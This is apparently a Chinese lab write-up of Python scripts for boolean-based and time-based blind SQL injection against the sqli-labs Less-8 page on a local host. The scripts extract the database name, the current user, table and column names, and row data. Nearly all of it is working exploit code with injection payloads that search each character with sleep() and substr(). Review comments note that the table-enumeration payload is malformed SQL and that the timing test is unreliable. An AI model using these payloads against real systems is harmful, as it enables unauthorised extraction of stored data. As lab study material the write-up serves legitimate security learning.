sql盲注脚本

在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据

发现页面加载了3秒左右可以进行盲注

布尔盲注数据库名

import requests


def inject_database(url):
    """Recover the current database name one character at a time (boolean-based blind).

    For each character position a binary search over ASCII 32-127 is run; the
    oracle is whether the lab's success marker "You are in..........." appears
    in the response body.  The first position that resolves to 32 (space) is
    treated as the end of the name.

    Args:
        url: Base URL of the sqli-labs Less-8 page (see ``__main__`` below).

    Returns:
        None; the recovered prefix is printed after every character.  (The
        second version of this function further down the page returns it.)
    """
    dataname=''
    for i in range(1,15):  # at most 14 positions are probed
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Oracle question for this round: is ascii(char i) > mid ?
            path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            # `path` lands in the positional `params` argument of requests.get;
            # a str there is appended to the URL as the query string verbatim.
            r = requests.get(url,path)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Nothing above space at this position -> end of the name.
            break
        dataname += chr(mid)
        print(dataname)

if __name__=='__main__':
    # Target is the local sqli-labs Less-8 instance used throughout this write-up.
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_database(url)

结果

用时间盲注出用户名

import requests
import time

def inject_user(url):
    """Recover the result of MySQL ``user()`` one character at a time (time-based blind).

    Each character position is resolved by binary search over ASCII 32-127.
    The oracle is purely the round-trip time: a request that takes longer
    than one second is taken to mean the injected ``sleep(1)`` branch ran.
    The first position that resolves to 32 (space) ends the loop.

    Args:
        url: Base URL of the sqli-labs Less-8 page (see ``__main__`` below).

    Returns:
        None; the recovered prefix is printed after every character.
    """
    user=''
    for i in range(1,15):  # at most 14 positions are probed
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
            res = {"id":payload}
            start_time = time.time()
            r = requests.get(url,params=res)
            # NOTE(review): the threshold equals the injected delay, so any
            # response that is merely slow on the no-delay branch is counted
            # as a match and corrupts the recovered string.  The response
            # body (r.text) is never consulted.
            if (time.time() - start_time)>1:
                # match succeeded: ascii(char i) > mid
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Resolved to space -> treated as end of string.
            break
        user += chr(mid)
        print(user)

if __name__=='__main__':
    # Target is the local sqli-labs Less-8 instance used throughout this write-up.
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_user(url)

结果

用盲注的方式查询表、列、具体数据

# Driver for the modules listed further down the page.  To run as one file it
# needs `import requests` / `import time` plus check_time_injection,
# inject_database, inject_tables, inject_columns and inject_data defined above
# this block.  Every later step reuses the name recovered by the earlier one.
if __name__ == '__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    
    # Current database name (boolean-based module)
    database_name = inject_database(url)
    print(f"Database name: {database_name}")
    
    # Table names in that database (time-based module)
    tables = inject_tables(url, database_name)
    print(f"Tables in database '{database_name}': {tables}")
    
    # Column names of one table
    table_name = 'users'  # replace with the target table name
    columns = inject_columns(url, table_name)
    print(f"Columns in table '{table_name}': {columns}")
    
    # Row values of one column of that table
    column_name = 'username'  # replace with the target column name
    data = inject_data(url, table_name, column_name)
    print(f"Data in column '{column_name}' of table '{table_name}': {data}")

时间检测模块

# Timing oracle shared by the time-based modules below.
def check_time_injection(url, payload):
    """Send ``payload`` as the ``id`` parameter and report whether it was slow.

    Args:
        url: Base URL of the target page.
        payload: Value placed in the ``id`` query parameter.

    Returns:
        True when the round trip took more than one second, which the callers
        interpret as the injected ``sleep(1)`` having fired.  The response
        body is ignored.
    """
    started = time.time()
    requests.get(url, params={"id": payload})
    return (time.time() - started) > 1

数据库模块

# Current database name, boolean-based blind (this version returns the result).
def inject_database(url):
    """Recover the current database name one character at a time (boolean-based blind).

    For each character position a binary search over ASCII 32-127 is run; the
    oracle is whether the lab's success marker "You are in..........." appears
    in the response body.  The first position that resolves to 32 (space) is
    treated as the end of the name.

    Args:
        url: Base URL of the target page.

    Returns:
        The recovered name (possibly empty); the prefix is also printed after
        every character.
    """
    dataname=''
    for i in range(1,15):  # at most 14 positions are probed
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Oracle question for this round: is ascii(char i) > mid ?
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            res = {"id":payload}
            r = requests.get(url,params=res)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # Nothing above space at this position -> end of the name.
            break
        dataname += chr(mid)
        print(dataname)
    return dataname

数据库中表名模块

# Table names of the given database, time-based blind via check_time_injection.
def inject_tables(url, database_name):
    """Enumerate table names one character at a time until an empty name is read.

    Outer loop walks ``table_index`` (1, 2, ...); inner loop resolves each
    character by binary search over ASCII 32-127 using the timing oracle.
    A position that resolves to 32 (space) ends the current name, and an
    empty name ends the enumeration.

    NOTE(review): unlike inject_columns below, this payload is not well-formed
    SQL (the subquery is not parenthesised and the closing parenthesis of
    substr() sits inside the comparison), so against the lab it is likely to
    resolve every position to 32 and return [] -- treat its output as unverified.

    Args:
        url: Base URL of the target page.
        database_name: Name interpolated into the payload's WHERE clause.

    Returns:
        List of recovered table names (empty when nothing was recovered).
    """
    tables = []
    table_index = 0
    
    while True:
        table_index += 1
        table_name = ''
        for i in range(1, 20):  # assumes names fit in 19 positions (range(1, 20))
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 (space) is taken as end of the name
                break
            table_name += chr(low)
            print(f"Current table name: {table_name}")
        
        if table_name:
            tables.append(table_name)
            print(f"Found table: {table_name}")
        else:
            break
    
    return tables

列名模块

def inject_columns(url, table_name):
    """Enumerate column names of ``table_name`` one character at a time.

    Outer loop walks ``column_index`` (1, 2, ...); inner loop resolves each
    character by binary search over ASCII 32-127 using the timing oracle
    ``check_time_injection``.  A position that resolves to 32 (space) ends
    the current name, and an empty name ends the enumeration.

    Args:
        url: Base URL of the target page.
        table_name: Name interpolated, unquoted apart from the SQL quotes in
            the payload, into the information_schema lookup.

    Returns:
        List of recovered column names (empty when nothing was recovered).
    """
    columns = []
    column_index = 0
    
    while True:
        column_index += 1
        column_name = ''
        for i in range(1, 20):  # assumes names fit in 19 positions (range(1, 20))
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 (space) is taken as end of the name
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            break
    
    return columns

指定查询数据模块

# Row values of one column, time-based blind via check_time_injection.
def inject_data(url, table_name, column_name):
    """Read ``column_name`` of ``table_name`` row by row, one character at a time.

    Outer loop walks ``row_index`` (1, 2, ...); inner loop resolves each
    character by binary search over ASCII 32-127 using the timing oracle.
    A position that resolves to 32 (space) ends the current value, and an
    empty value ends the enumeration -- so a genuinely empty cell also stops
    it early.

    Args:
        url: Base URL of the target page.
        table_name: Interpolated verbatim into the FROM clause.
        column_name: Interpolated verbatim into the SELECT list.

    Returns:
        List of recovered row values (empty when nothing was recovered).
    """
    data = []
    row_index = 0
    
    while True:
        row_index += 1
        row_value = ''
        for i in range(1, 20):  # assumes values fit in 19 positions (range(1, 20))
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 (space) is taken as end of the value
                break
            row_value += chr(low)
            print(f"Current row value: {row_value}")
        
        if row_value:
            data.append(row_value)
            print(f"Found data: {row_value}")
        else:
            break
    
    return data

结果

数据库

user
